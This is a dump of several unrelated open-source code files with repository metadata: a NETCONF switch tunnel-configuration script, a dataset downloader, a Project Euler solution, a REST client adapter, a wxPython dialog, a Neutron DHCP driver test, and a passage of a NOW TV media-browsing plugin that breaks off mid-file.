macauleycheng/AOS_OF_Example | 00-table-group-unit-test/17-L2_Overlay_Group_Flood_Over_UC_Tunnel/edit_config.py | 1 | 8084 | import pkg_resources
pkg_resources.require("ncclient==0.4.3")
from ncclient import manager
import ncclient
# Due to an OF-Config design problem, the port "features" element must be
# filled in, but we won't actually use it.
#of-agent nexthop 2 destination user-input-dst-mac ethernet 1/2 vid 2
config_nexthop_ucast_xml="""
<config>
<of11-config:capable-switch xmlns:of11-config="urn:onf:of111:config:yang">
<ofdpa10:next-hop xmlns:ofdpa10="urn:bcm:ofdpa10:accton01">
<ofdpa10:id>2</ofdpa10:id>
<ofdpa10:dest-mac>user-input-dst-mac</ofdpa10:dest-mac>
<ofdpa10:phy-port>2</ofdpa10:phy-port>
<ofdpa10:vid>2</ofdpa10:vid>
</ofdpa10:next-hop>
</of11-config:capable-switch>
</config>
"""
#of-agent nexthop 20 destination 01-00-5e-01-01-01 ethernet 1/2 vid 2
config_nexthop_mcast_xml="""
<config>
<of11-config:capable-switch xmlns:of11-config="urn:onf:of111:config:yang">
<ofdpa10:next-hop xmlns:ofdpa10="urn:bcm:ofdpa10:accton01">
<ofdpa10:id>20</ofdpa10:id>
<ofdpa10:dest-mac>01:00:5E:01:01:01</ofdpa10:dest-mac>
<ofdpa10:phy-port>2</ofdpa10:phy-port>
<ofdpa10:vid>2</ofdpa10:vid>
</ofdpa10:next-hop>
</of11-config:capable-switch>
</config>
"""
#of-agent vni 10
config_vni_xml="""
<config>
<of11-config:capable-switch xmlns:of11-config="urn:onf:of111:config:yang">
<ofdpa10:vni xmlns:ofdpa10="urn:bcm:ofdpa10:accton01">
<ofdpa10:id>10</ofdpa10:id>
</ofdpa10:vni>
</of11-config:capable-switch>
</config>
"""
#of-agent vtap 10001 ethernet 1/1 vid 1
#of-agent vtp 10001 vni 10
config_vtap_xml="""
<config>
<capable-switch xmlns="urn:onf:of111:config:yang">
<id>capable-switch-1</id>
<resources>
<port>
<resource-id>10001</resource-id>
<features>
<current>
<rate>10Gb</rate>
<medium>fiber</medium>
<pause>symmetric</pause>
</current>
<advertised>
<rate>10Gb</rate>
<rate>100Gb</rate>
<medium>fiber</medium>
<pause>symmetric</pause>
</advertised>
<supported>
<rate>10Gb</rate>
<rate>100Gb</rate>
<medium>fiber</medium>
<pause>symmetric</pause>
</supported>
<advertised-peer>
<rate>10Gb</rate>
<rate>100Gb</rate>
<medium>fiber</medium>
<pause>symmetric</pause>
</advertised-peer>
</features>
<ofdpa10:vtap xmlns:ofdpa10="urn:bcm:ofdpa10:accton01">
<ofdpa10:phy-port>1</ofdpa10:phy-port>
<ofdpa10:vid>1</ofdpa10:vid>
<ofdpa10:vni>10</ofdpa10:vni>
</ofdpa10:vtap>
</port>
</resources>
<logical-switches>
<switch>
<id>user-input-switch-cpu-mac</id>
<datapath-id>user-input-switch-cpu-mac</datapath-id>
<resources>
<port>10001</port>
</resources>
</switch>
</logical-switches>
</capable-switch>
</config>
"""
#of-agent vtep 10002 source user-input-src-ip destination user-input-dst-ip udp-source-port 6633 nexthop 2 ttl 25
config_vtep_xml="""
<config>
<capable-switch xmlns="urn:onf:of111:config:yang">
<id>capable-switch-1</id>
<ofdpa10:udp-dest-port xmlns:ofdpa10="urn:bcm:ofdpa10:accton01">6633</ofdpa10:udp-dest-port>
<resources>
<port>
<resource-id>10002</resource-id>
<features>
<current>
<rate>10Gb</rate>
<medium>fiber</medium>
<pause>symmetric</pause>
</current>
<advertised>
<rate>10Gb</rate>
<rate>100Gb</rate>
<medium>fiber</medium>
<pause>symmetric</pause>
</advertised>
<supported>
<rate>10Gb</rate>
<rate>100Gb</rate>
<medium>fiber</medium>
<pause>symmetric</pause>
</supported>
<advertised-peer>
<rate>10Gb</rate>
<rate>100Gb</rate>
<medium>fiber</medium>
<pause>symmetric</pause>
</advertised-peer>
</features>
<ofdpa10:vtep xmlns:ofdpa10="urn:bcm:ofdpa10:accton01">
<ofdpa10:src-ip>user-input-src-ip</ofdpa10:src-ip>
<ofdpa10:dest-ip>user-input-dst-ip</ofdpa10:dest-ip>
<ofdpa10:udp-src-port>6633</ofdpa10:udp-src-port>
<ofdpa10:vni>10</ofdpa10:vni>
<ofdpa10:nexthop-id>2</ofdpa10:nexthop-id>
<ofdpa10:ttl>25</ofdpa10:ttl>
</ofdpa10:vtep>
</port>
</resources>
<logical-switches>
<switch>
<id>user-input-switch-cpu-mac</id>
<datapath-id>user-input-switch-cpu-mac</datapath-id>
<resources>
<port>10002</port>
</resources>
</switch>
</logical-switches>
</capable-switch>
</config>
"""
def replace_vtep_vtap_nexthop(sip, dip, smac, dmac):
global nexthop_ucast_xml
nexthop_ucast_xml=config_nexthop_ucast_xml.replace("user-input-dst-mac", dmac)
global vtep_xml
vtep_xml=config_vtep_xml.replace("user-input-switch-cpu-mac", "00:00:"+smac)
vtep_xml=vtep_xml.replace("user-input-src-ip", sip)
vtep_xml=vtep_xml.replace("user-input-dst-ip", dip)
global vtap_xml
vtap_xml=config_vtap_xml.replace("user-input-switch-cpu-mac","00:00:"+smac)
def send_edit_config(host_ip, username, password):
with manager.connect_ssh(host=host_ip, port=830, username=username, password=password, hostkey_verify=False ) as m:
try:
m.edit_config(target='running',
config=nexthop_ucast_xml,
default_operation='merge',
error_option='stop-on-error')
except Exception as e:
print "Fail to edit-config config_nexthop_ucast_xml"
return -1
try:
m.edit_config(target='running',
config=config_nexthop_mcast_xml,
default_operation='merge',
error_option='stop-on-error')
except Exception as e:
print "Fail to edit-config config_nexthop_mcast_xml"
return -1
try:
m.edit_config(target='running',
config=config_vni_xml,
default_operation='merge',
error_option='stop-on-error')
except Exception as e:
print "Fail to edit-config config_vni_xml"
return -1
try:
m.edit_config(target='running',
config=vtep_xml,
default_operation='merge',
error_option='stop-on-error')
except Exception as e:
print "Fail to edit-config vtep_xml"
return -1
try:
m.edit_config(target='running',
config=vtap_xml,
default_operation='merge',
error_option='stop-on-error')
except Exception as e:
print "Fail to edit-config vtap_xml"
return -1
print m.get_config(source='running').data_xml
#replace_vtep_vtap_nexthop("10.1.1.1", "10.1.2.1", "70:72:cf:dc:9e:da", "70:72:cf:b5:ea:88")
#send_edit_config("192.168.1.1", "netconfuser", "netconfuser")
| apache-2.0 | 277,871,642,250,651,300 | 33.769912 | 119 | 0.517566 | false |
euclidjda/deep-quant | scripts/build_datfile.py | 1 | 2682 | #! /usr/bin/env python3
# Copyright 2016 Euclidean Technologies Management LLC All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import gzip
import wget
import argparse
data_url = 'http://data.euclidean.com/open-data/'
data_dir = 'datasets'
s3_bucket = 'deep-quant-data'
# we should read this list from file in datasets
remote_file = 'open-dataset-2018-04-25.dat.gz'
local_file = 'open-dataset.dat'
def maybe_download(directory, filename, url):
"""Download filename from url unless it's already in directory."""
if not os.path.exists(directory):
print("Creating directory %s" % directory)
os.mkdir(directory)
filepath = os.path.join(directory, filename)
if not os.path.exists(filepath):
print("Downloading %s" % (url+filename))
wget.download(url+filename, out=directory)
statinfo = os.stat(filepath)
print("\nSuccesfully downloaded", filename, statinfo.st_size, "bytes")
else:
print("File %s already exists in %s" % (filename, directory))
return filepath
def gunzip_file(gz_path, new_path):
"""Unzips from gz_path into new_path unless it's already unzipped."""
if not os.path.exists(new_path):
with gzip.open(gz_path, "rb") as gz_file:
with open(new_path, "wb") as new_file:
for line in gz_file:
new_file.write(line)
print("Unpacked %s to %s" % (gz_path, new_path))
else:
print("Did not unzip %s because %s already exists." % (gz_path,
new_path))
def download_data():
print("Downloading data ...")
maybe_download(data_dir, remote_file, data_url)
gz_path = os.path.join(data_dir, remote_file)
datfile_path = os.path.join(data_dir, local_file)
gunzip_file(gz_path, datfile_path)
def main():
open_dataset_path = os.path.join(data_dir, local_file)
download_data()
if __name__ == '__main__':
main()
| mit | -2,462,238,654,152,892,400 | 34.289474 | 80 | 0.641685 | false |
tijko/Project-Euler | py_solutions_81-90/Euler_83.py | 1 | 3306 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
Minimal path sum in an 80x80 matrix, from the top-left node to the
bottom-right node, moving in the up, down, left, or right directions.
'''
from __future__ import print_function
import timeit
import os
try:
range = xrange
except NameError:
pass
path = os.getcwd().strip('py_solutions_81-90')
with open(path + 'euler_txt/matrix.txt') as f:
edges = [list(map(int, v.split(','))) for v in f.readlines()]
traveled = [['inf'] * 80 for _ in range(80)]
def euler_83():
x = y = 0
heap = [[y, x]]
while heap:
y, x = heap.pop(0)
traverse(y, x, heap)
return traveled[79][79]
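# traverse() relaxes the four neighbours of (y, x) Dijkstra-style: each of the
# *_edge() helpers below updates a neighbour's best-known cost in `traveled`,
# the cheapest improving move is followed recursively, and the remaining
# improving moves are pushed onto `heap` (a plain FIFO list) so euler_83() can
# revisit them later. Note that `mvs` is keyed by cost, so two moves with an
# identical cost collapse into a single dictionary entry.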
def traverse(y, x, heap):
bounds = 80
r_vertex = d_vertex = u_vertex = l_vertex = False
if traveled[y][x] == 'inf':
traveled[y][x] = curr = edges[y][x]
else:
curr = traveled[y][x]
if x + 1 >= bounds and y + 1 >= bounds:
return
if y + 1 < bounds:
d_vertex = d_edge(y, x, curr)
if x + 1 < bounds:
r_vertex = r_edge(y, x, curr)
if y - 1 >= 0:
u_vertex = u_edge(y, x, curr)
if x - 1 >= 0:
l_vertex = l_edge(y, x, curr)
mvs = {d_vertex:'d_vertex',
r_vertex:'r_vertex',
u_vertex:'u_vertex',
l_vertex:'l_vertex'
}
if any(mvs):
mvs = {k:v for k,v in mvs.items() if k}
next_mv = min(mvs)
heap_mv = [mv for mv in mvs.values() if mv != mvs[next_mv]]
push_heap(y, x, heap, heap_mv)
if mvs[next_mv] == 'd_vertex':
traverse(y + 1, x, heap)
elif mvs[next_mv] == 'r_vertex':
traverse(y, x + 1, heap)
elif mvs[next_mv] == 'u_vertex':
traverse(y - 1, x, heap)
else:
traverse(y, x - 1, heap)
def d_edge(y, x, curr):
d_vertex = curr + edges[y + 1][x]
if traveled[y + 1][x] == 'inf':
traveled[y + 1][x] = d_vertex
elif d_vertex < traveled[y + 1][x]:
traveled[y + 1][x] = d_vertex
else:
d_vertex = False
return d_vertex
def r_edge(y, x, curr):
r_vertex = curr + edges[y][x + 1]
if traveled[y][x + 1] == 'inf':
traveled[y][x + 1] = r_vertex
elif r_vertex < traveled[y][x + 1]:
traveled[y][x + 1] = r_vertex
else:
r_vertex = False
return r_vertex
def u_edge(y, x, curr):
u_vertex = curr + edges[y - 1][x]
if traveled[y - 1][x] == 'inf':
traveled[y - 1][x] = u_vertex
elif u_vertex < traveled[y - 1][x]:
traveled[y - 1][x] = u_vertex
else:
u_vertex = False
return u_vertex
def l_edge(y, x, curr):
l_vertex = curr + edges[y][x - 1]
if traveled[y][x - 1] == 'inf':
traveled[y][x - 1] = l_vertex
elif l_vertex < traveled[y][x - 1]:
traveled[y][x - 1] = l_vertex
else:
l_vertex = False
return l_vertex
def push_heap(y, x, heap, heap_mv):
mv_coor = {'d_vertex':[y + 1,x],
'r_vertex':[y, x + 1],
'u_vertex':[y - 1, x],
'l_vertex':[y, x - 1]
}
heap.extend([mv_coor[i] for i in heap_mv])
if __name__ == '__main__':
start = timeit.default_timer()
print('Answer: {}'.format(euler_83()))
stop = timeit.default_timer()
print('Time: {0:9.5f}'.format(stop - start))
| mit | -351,287,273,247,766,900 | 25.238095 | 72 | 0.503327 | false |
tsheets/api_python | tsheets/rest_adapter.py | 1 | 2352 | from . import error
import logging
import requests
class RestAdapter(object):
def __init__(self):
self.logger = logging.getLogger('tsheets_logger')
def get(self, url, params, headers):
self.logger.debug("GET {} {} {}".format(url, params, headers))
response = None
try:
response = requests.get(url, params=params, headers=headers)
response.raise_for_status()
return response
except requests.exceptions.RequestException as e:
if response is not None:
if response.status_code == 417:
raise error.TSheetsExpectedError(e, response)
raise error.TSheetsError(e)
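    # Usage sketch (endpoint and token are hypothetical, for illustration
    # only):
    #
    #   adapter = RestAdapter()
    #   resp = adapter.get("https://rest.tsheets.com/api/v1/users",
    #                      params={"page": 1},
    #                      headers={"Authorization": "Bearer <token>"})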
def post(self, url, data, options):
self.logger.debug("POST {} {} {}".format(url, data, options))
response = None
try:
options.update({'Content-type': 'application/json'})
response = requests.post(url, json=data, headers=options)
response.raise_for_status()
return response
except requests.exceptions.RequestException as e:
if response is not None:
if response.status_code == 417:
raise error.TSheetsExpectedError(e, response)
raise error.TSheetsError(e)
def put(self, url, data, options):
self.logger.debug("PUT {} {} {}".format(url, data, options))
response = None
try:
options.update({'Content-type': 'application/json'})
response = requests.put(url, json=data, headers=options)
response.raise_for_status()
return response
except requests.exceptions.RequestException as e:
if response is not None:
if response.status_code == 417:
raise error.TSheetsExpectedError(e, response)
raise error.TSheetsError(e)
def delete(self, url, data, options):
self.logger.debug("DELETE {} {} {}".format(url, data, options))
try:
ids_to_delete = ','.join(str(id) for id in data['ids'])
response = requests.delete(url, params={"ids":ids_to_delete }, headers=options)
response.raise_for_status()
return response
except requests.exceptions.RequestException as e:
raise error.TSheetsError(e) | mit | -1,571,255,879,130,527,200 | 38.881356 | 91 | 0.58716 | false |
nathanbjenx/cairis | cairis/gui/DictionaryEntryDialog.py | 1 | 2956 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import wx
from cairis.core.armid import *
import WidgetFactory
__author__ = 'Shamal Faily'
class DictionaryEntryDialog(wx.Dialog):
def __init__(self,parent,name = '',definition = ''):
wx.Dialog.__init__(self,parent,DICTIONARYENTRY_ID,'Add Dictionary Entry',style=wx.DEFAULT_DIALOG_STYLE|wx.MAXIMIZE_BOX|wx.THICK_FRAME|wx.RESIZE_BORDER,size=(500,300))
self.theName = name
self.theDefinition = definition
mainSizer = wx.BoxSizer(wx.VERTICAL)
mainSizer.Add(WidgetFactory.buildTextSizer(self,'Name',(87,30),DICTIONARYENTRY_TEXTNAME_ID),0,wx.EXPAND)
mainSizer.Add(WidgetFactory.buildMLTextSizer(self,'Definition',(87,30),DICTIONARYENTRY_TEXTDEFINITION_ID),1,wx.EXPAND)
mainSizer.Add(WidgetFactory.buildAddCancelButtonSizer(self,DICTIONARYENTRY_BUTTONCOMMIT_ID),0,wx.ALIGN_CENTER)
self.SetSizer(mainSizer)
wx.EVT_BUTTON(self,DICTIONARYENTRY_BUTTONCOMMIT_ID,self.onCommit)
self.commitLabel = 'Add'
if (len(self.theName) > 0):
self.commitLabel = 'Edit'
self.SetLabel('Edit Dictionary Entry')
nameCtrl = self.FindWindowById(DICTIONARYENTRY_TEXTNAME_ID)
nameCtrl.SetValue(self.theName)
defCtrl = self.FindWindowById(DICTIONARYENTRY_TEXTDEFINITION_ID)
defCtrl.SetValue(self.theDefinition)
buttonCtrl = self.FindWindowById(DICTIONARYENTRY_BUTTONCOMMIT_ID)
buttonCtrl.SetLabel('Edit')
def onCommit(self,evt):
nameCtrl = self.FindWindowById(DICTIONARYENTRY_TEXTNAME_ID)
defCtrl = self.FindWindowById(DICTIONARYENTRY_TEXTDEFINITION_ID)
self.theName = nameCtrl.GetValue()
self.theDefinition = defCtrl.GetValue()
if (len(self.theName) == 0):
dlg = wx.MessageDialog(self,'No name entry',self.commitLabel + ' Dictionary Entry',wx.OK)
dlg.ShowModal()
dlg.Destroy()
return
elif (len(self.theDefinition) == 0):
dlg = wx.MessageDialog(self,'No definition entry',self.commitLabel + ' Dictionary Entry',wx.OK)
dlg.ShowModal()
dlg.Destroy()
return
else:
self.EndModal(DICTIONARYENTRY_BUTTONCOMMIT_ID)
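  # Usage sketch (assumes a running wx App and a parent window; the values
  # are illustrative):
  #
  #   dlg = DictionaryEntryDialog(parent, name='asset', definition='...')
  #   if dlg.ShowModal() == DICTIONARYENTRY_BUTTONCOMMIT_ID:
  #     entryName, entryDef = dlg.name(), dlg.definition()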
def name(self): return self.theName
def definition(self): return self.theDefinition
| apache-2.0 | -2,763,793,593,359,944,700 | 40.055556 | 170 | 0.732747 | false |
midonet/python-neutron-plugin-midonet | midonet/neutron/tests/unit/test_midonet_driver.py | 1 | 2110 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (C) 2012 Midokura Japan K.K.
# Copyright (C) 2013 Midokura PTE LTD
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
import sys
sys.modules["midonetclient"] = mock.Mock()
from neutron.agent.common import config
from neutron.agent.linux import dhcp
from neutron.common import config as base_config
import midonet.neutron.agent.midonet_driver as driver
from neutron.tests import base
class FakeNetwork:
id = 'aaaabbbb-cccc-dddd-eeee-ffff00001111'
namespace = 'qdhcp-ns'
class TestDhcpNoOpDriver(base.BaseTestCase):
def setUp(self):
super(TestDhcpNoOpDriver, self).setUp()
self.conf = config.setup_conf()
config.register_interface_driver_opts_helper(self.conf)
self.conf.register_opts(base_config.core_opts)
self.conf.register_opts(dhcp.OPTS)
self.conf.enable_isolated_metadata = True
self.conf.use_namespaces = True
instance = mock.patch("neutron.agent.linux.dhcp.DeviceManager")
self.mock_mgr = instance.start()
self.addCleanup(instance.stop)
def test_disable_no_retain_port(self):
dhcp_driver = driver.DhcpNoOpDriver(self.conf, FakeNetwork())
dhcp_driver.disable(retain_port=False)
self.assertTrue(self.mock_mgr.return_value.destroy.called)
def test_disable_retain_port(self):
dhcp_driver = driver.DhcpNoOpDriver(self.conf, FakeNetwork())
dhcp_driver.disable(retain_port=True)
self.assertFalse(self.mock_mgr.return_value.destroy.called)
| apache-2.0 | -6,664,119,107,720,711,000 | 36.017544 | 78 | 0.718009 | false |
n3wb13/OpenNfrGui-5.0-1 | lib/python/Plugins/Extensions/MediaPortal/additions/mediatheken/nowtv.py | 1 | 14451 | # -*- coding: utf-8 -*-
###############################################################################################
#
# MediaPortal for Dreambox OS
#
# Coded by MediaPortal Team (c) 2013-2015
#
# This plugin is open source but it is NOT free software.
#
# This plugin may only be distributed to and executed on hardware which
# is licensed by Dream Property GmbH. This includes commercial distribution.
# In other words:
# It's NOT allowed to distribute any parts of this plugin or its source code in ANY way
# to hardware which is NOT licensed by Dream Property GmbH.
# It's NOT allowed to execute this plugin and its source code or even parts of it in ANY way
# on hardware which is NOT licensed by Dream Property GmbH.
#
# This applies to the source code as a whole as well as to parts of it, unless
# explicitely stated otherwise.
#
# If you want to use or modify the code or parts of it,
# you have to keep OUR license and inform us about the modifications, but it may NOT be
# commercially distributed other than under the conditions noted above.
#
# As an exception regarding modifcations, you are NOT permitted to remove
# any copy protections implemented in this plugin or change them for means of disabling
# or working around the copy protections, unless the change has been explicitly permitted
# by the original authors. Also decompiling and modification of the closed source
# parts is NOT permitted.
#
# Advertising with this plugin is NOT allowed.
# For other uses, permission from the authors is necessary.
#
###############################################################################################
from Plugins.Extensions.MediaPortal.plugin import _
from Plugins.Extensions.MediaPortal.resources.imports import *
from Plugins.Extensions.MediaPortal.resources.twagenthelper import twAgentGetPage
from Plugins.Extensions.MediaPortal.resources.playrtmpmovie import PlayRtmpMovie
BASE_URL = "https://api.nowtv.de/v3/"
def remove_start(s, start):
if s.startswith(start):
return s[len(start):]
return s
class nowtvFirstScreen(MPScreen, ThumbsHelper):
def __init__(self, session):
self.plugin_path = mp_globals.pluginPath
self.skin_path = mp_globals.pluginPath + mp_globals.skinsPath
path = "%s/%s/defaultGenreScreenCover.xml" % (self.skin_path, config.mediaportal.skin.value)
if not fileExists(path):
path = self.skin_path + mp_globals.skinFallback + "/defaultGenreScreenCover.xml"
with open(path, "r") as f:
self.skin = f.read()
f.close()
MPScreen.__init__(self, session)
ThumbsHelper.__init__(self)
self["actions"] = ActionMap(["MP_Actions"], {
"0" : self.closeAll,
"ok" : self.keyOK,
"cancel": self.keyCancel,
"5" : self.keyShowThumb,
"up" : self.keyUp,
"down" : self.keyDown,
"right" : self.keyRight,
"left" : self.keyLeft
}, -1)
self['title'] = Label("NOW TV")
self['ContentTitle'] = Label(_("Stations:"))
self['name'] = Label(_("Selection:"))
self.keyLocked = True
self.senderliste = []
self.ml = MenuList([], enableWrapAround=True, content=eListboxPythonMultiContent)
self['liste'] = self.ml
self.onLayoutFinish.append(self.genreData)
def genreData(self):
self.senderliste.append(("RTL", "rtl", "http://cdn.static-fra.de/nowtv/default/rtl_portrait.jpg"))
self.senderliste.append(("VOX", "vox", "http://cdn.static-fra.de/nowtv/default/vox_portrait.jpg"))
self.senderliste.append(("RTL2", "rtl2", "http://cdn.static-fra.de/nowtv/default/rtl2_portrait.jpg"))
self.senderliste.append(("RTLNITRO", "nitro", "http://cdn.static-fra.de/nowtv/default/nitro_portrait.jpg"))
self.senderliste.append(("SUPER RTL", "superrtl", "http://cdn.static-fra.de/nowtv/default/superrtl_portrait.jpg"))
self.senderliste.append(("n-tv", "ntv", "http://cdn.static-fra.de/nowtv/default/ntv_portrait.jpg"))
self.ml.setList(map(self._defaultlistcenter, self.senderliste))
self.keyLocked = False
self.th_ThumbsQuery(self.senderliste, 0, 1, 2, None, None, 1, 1, mode=1)
self.showInfos()
def showInfos(self):
Image = self['liste'].getCurrent()[0][2]
CoverHelper(self['coverArt']).getCover(Image)
Name = self['liste'].getCurrent()[0][0]
self['name'].setText(_("Selection:") + " " + Name)
def keyOK(self):
if self.keyLocked:
return
Name = self['liste'].getCurrent()[0][0]
Link = self['liste'].getCurrent()[0][1]
Image = self['liste'].getCurrent()[0][2]
self.session.open(nowtvSubGenreScreen, Link, Name, Image)
class nowtvSubGenreScreen(MPScreen, ThumbsHelper):
def __init__(self, session, Link, Name, Image):
self.Link = Link
self.Name = Name
self.Image = Image
self.plugin_path = mp_globals.pluginPath
self.skin_path = mp_globals.pluginPath + mp_globals.skinsPath
path = "%s/%s/defaultGenreScreenCover.xml" % (self.skin_path, config.mediaportal.skin.value)
if not fileExists(path):
path = self.skin_path + mp_globals.skinFallback + "/defaultGenreScreenCover.xml"
with open(path, "r") as f:
self.skin = f.read()
f.close()
MPScreen.__init__(self, session)
ThumbsHelper.__init__(self)
self["actions"] = ActionMap(["MP_Actions"], {
"0" : self.closeAll,
"ok" : self.keyOK,
"cancel": self.keyCancel,
"5" : self.keyShowThumb,
"up" : self.keyUp,
"down" : self.keyDown,
"right" : self.keyRight,
"left" : self.keyLeft
}, -1)
self['title'] = Label("NOW TV")
self['ContentTitle'] = Label(_("Selection:"))
self['name'] = Label(_("Selection:") + " " + self.Name)
self.keyLocked = True
self.filmliste = []
self.ml = MenuList([], enableWrapAround=True, content=eListboxPythonMultiContent)
self['liste'] = self.ml
self.onLayoutFinish.append(self.loadPage)
def loadPage(self):
url = BASE_URL + "formats?fields=title,seoUrl,icon,defaultImage169Logo,defaultImage169Format&filter=%7B%22Station%22:%22" + self.Link + "%22,%22Disabled%22:%220%22,%22CategoryId%22:%7B%22containsIn%22:%5B%22serie%22,%22news%22%5D%7D%7D&maxPerPage=1000"
twAgentGetPage(url).addCallback(self.parseData).addErrback(self.dataError)
def parseData(self, data):
nowdata = json.loads(data)
for node in nowdata["items"]:
if str(node["icon"]) == "new" or str(node["icon"]) == "free":
image = str(node["defaultImage169Logo"])
if image == "":
image = str(node["defaultImage169Format"])
if image == "":
image = self.Image
self.filmliste.append((str(node["title"]), str(node["seoUrl"]), image))
self.filmliste.sort(key=lambda t : t[0].lower())
self.ml.setList(map(self._defaultlistcenter, self.filmliste))
self.keyLocked = False
self.th_ThumbsQuery(self.filmliste, 0, 1, 2, None, None, 1, 1, mode=1)
self.showInfos()
def showInfos(self):
Image = self['liste'].getCurrent()[0][2]
CoverHelper(self['coverArt']).getCover(Image)
Name = self['liste'].getCurrent()[0][0]
self['name'].setText(_("Selection:") + " " + self.Name + ":" + Name)
def keyOK(self):
exist = self['liste'].getCurrent()
if self.keyLocked or exist == None:
return
Name = self.Name + ":" + self['liste'].getCurrent()[0][0]
Link = self['liste'].getCurrent()[0][1]
Image = self['liste'].getCurrent()[0][2]
self.session.open(nowtvStaffelScreen, Link, Name, Image)
class nowtvStaffelScreen(MPScreen):
def __init__(self, session, Link, Name, Image):
self.Link = Link
self.Name = Name
self.Image = Image
self.plugin_path = mp_globals.pluginPath
self.skin_path = mp_globals.pluginPath + mp_globals.skinsPath
path = "%s/%s/defaultGenreScreenCover.xml" % (self.skin_path, config.mediaportal.skin.value)
if not fileExists(path):
path = self.skin_path + mp_globals.skinFallback + "/defaultGenreScreenCover.xml"
with open(path, "r") as f:
self.skin = f.read()
f.close()
MPScreen.__init__(self, session)
self["actions"] = ActionMap(["MP_Actions"], {
"0" : self.closeAll,
"ok" : self.keyOK,
"cancel": self.keyCancel,
"up" : self.keyUp,
"down" : self.keyDown,
"right" : self.keyRight,
"left" : self.keyLeft
}, -1)
self['title'] = Label("NOW TV")
self['ContentTitle'] = Label(_("Seasons:"))
self['name'] = Label(_("Selection:") + " " + self.Name)
self.keyLocked = True
self.filmliste = []
self.ml = MenuList([], enableWrapAround=True, content=eListboxPythonMultiContent)
self['liste'] = self.ml
self.onLayoutFinish.append(self.loadPage)
def loadPage(self):
url = BASE_URL + "formats/seo?fields=formatTabs.*&name=" + self.Link + ".php"
twAgentGetPage(url).addCallback(self.parseData).addErrback(self.dataError)
def parseData(self, data):
nowdata = json.loads(data)
for node in nowdata["formatTabs"]["items"]:
self.filmliste.append((str(node["headline"]), str(node["id"]), str(node["visible"]),str(node["tv"])))
self.ml.setList(map(self._defaultlistcenter, self.filmliste))
self.keyLocked = False
CoverHelper(self['coverArt']).getCover(self.Image)
self.showInfos()
def showInfos(self):
Name = self['liste'].getCurrent()[0][0]
self['name'].setText(_("Selection:") + " " + self.Name + ":" + Name)
def keyOK(self):
exist = self['liste'].getCurrent()
if self.keyLocked or exist == None:
return
Name = self.Name + ":" + self['liste'].getCurrent()[0][0]
Link = self['liste'].getCurrent()[0][1]
self.session.open(nowtvEpisodenScreen, Link, Name, self.Image)
class nowtvEpisodenScreen(MPScreen, ThumbsHelper):
def __init__(self, session, Link, Name, Image):
self.Link = Link
self.Name = Name
self.Image = Image
self.plugin_path = mp_globals.pluginPath
self.skin_path = mp_globals.pluginPath + mp_globals.skinsPath
path = "%s/%s/defaultListWideScreen.xml" % (self.skin_path, config.mediaportal.skin.value)
if not fileExists(path):
path = self.skin_path + mp_globals.skinFallback + "/defaultListWideScreen.xml"
with open(path, "r") as f:
self.skin = f.read()
f.close()
MPScreen.__init__(self, session)
ThumbsHelper.__init__(self)
self["actions"] = ActionMap(["MP_Actions"], {
"0" : self.closeAll,
"ok" : self.keyOK,
"cancel": self.keyCancel,
"5" : self.keyShowThumb,
"up" : self.keyUp,
"down" : self.keyDown,
"right" : self.keyRight,
"left" : self.keyLeft,
"blue" : self.keyTxtPageDown,
"red" : self.keyTxtPageUp
}, -1)
self['title'] = Label("NOW TV")
self['ContentTitle'] = Label(_("Episodes:"))
self['name'] = Label(_("Selection:") + " " + self.Name)
self['F1'] = Label(_("Text-"))
self['F4'] = Label(_("Text+"))
self.keyLocked = True
self.filmliste = []
self.ml = MenuList([], enableWrapAround=True, content=eListboxPythonMultiContent)
self['liste'] = self.ml
self.onLayoutFinish.append(self.loadPage)
def loadPage(self):
url = BASE_URL + "formatlists/" + self.Link + "?fields=*,formatTabPages.*,formatTabPages.container.movies.*,formatTabPages.container.movies.format.*,formatTabPages.container.movies.livestreamEvent.*,formatTabPages.container.movies.pictures,formatTabPages.container.movies.files.*"
twAgentGetPage(url).addCallback(self.parseData).addErrback(self.dataError)
def parseData(self, data):
nowdata = json.loads(data)
for node in nowdata["formatTabPages"]["items"]:
try:
for nodex in node["container"]["movies"]["items"]:
try:
if nodex["free"]:
try:
image = "http://autoimg.rtl.de/rtlnow/%s/660x660/formatimage.jpg" % nodex["pictures"]["default"][0]["id"]
except:
image = self.Image
try:
file = str(nodex["files"]["items"][0]["path"])
file = re.sub(r'/(.+)/((\d+)/(.*))', r'/\1/videos/\2', file)
file = file.strip('/')
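								# The re.sub above rewrites '/<prefix>/<id>/<name>' into
								# '/<prefix>/videos/<id>/<name>', inserting a 'videos' segment
								# before the last numeric path component.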
except:
file = None
self.filmliste.append((str(nodex["title"]), str(nodex["id"]), str(nodex["articleLong"]), image, file))
except:
continue
except:
continue
if len(self.filmliste) == 0:
			# Placeholder row, padded to the same 5-tuple shape as real episodes
			# so showInfos()/keyOK() can index it safely.
			self.filmliste.append((_('Currently no free episodes available!'), None, '', None, None))
self.ml.setList(map(self._defaultlistcenter, self.filmliste))
self.keyLocked = False
self.th_ThumbsQuery(self.filmliste, 0, 1, 2, None, None, 1, 1, mode=1)
self.showInfos()
def showInfos(self):
